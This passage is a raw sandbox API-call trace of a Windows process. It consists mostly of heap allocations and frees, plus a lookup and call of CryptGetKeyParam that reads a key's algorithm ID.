0x43cfab8 [0094.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0094.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0094.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0094.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0094.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0094.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0094.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0094.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0094.664] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0094.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0094.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0094.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0094.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0094.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0094.665] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0094.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0094.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0094.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0094.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0094.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0094.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0094.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0094.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0094.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0094.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0094.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0094.665] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0094.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0094.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0094.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0094.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2900 [0094.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0094.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0094.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0094.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0094.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9e8 [0094.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0094.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0094.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0094.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0094.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0094.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0094.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0094.666] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0094.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0094.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0094.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0094.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0094.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0094.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0094.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0094.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0094.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0094.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0094.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0094.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0094.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0094.667] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0094.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0094.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0094.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0094.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0094.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0094.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0094.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0094.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0094.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0094.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0094.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0094.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0094.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0094.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0094.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0094.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0094.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0094.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0094.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0094.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0094.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0094.668] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0094.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0094.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0094.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0094.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0094.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0094.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0094.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0094.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0094.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0094.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0094.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0094.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0094.669] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0094.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0094.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca838 [0094.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0094.669] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0094.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0094.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0094.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0094.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0094.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0094.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0094.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0094.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0094.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0094.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0094.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0094.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0094.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0094.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0094.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0094.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0094.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0094.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0094.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0094.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0094.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0094.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0094.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0094.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0094.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0094.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0094.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0094.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0094.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0094.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0094.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0094.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0094.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0094.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0094.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0094.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0094.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0094.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0094.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0094.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0094.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0094.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0094.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0094.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0094.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0094.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0094.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0094.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0094.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0094.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0094.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0094.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0094.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0094.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0094.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0094.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0094.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0094.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0094.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0094.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0094.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0094.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0094.672] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0094.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0094.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0094.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0094.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0094.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0094.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0094.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0094.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0094.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0094.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0094.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0094.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0094.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0094.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0094.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0094.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0094.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0094.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0094.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0094.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0094.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0094.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0094.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0094.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797008, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0094.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0094.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0094.673] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0094.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0094.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0094.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0094.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0094.674] CryptGetKeyParam (in: hKey=0x41ac280, dwParam=0x7, pbData=0x43e28b0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e28b0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0094.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0094.675] HeapFree (in: 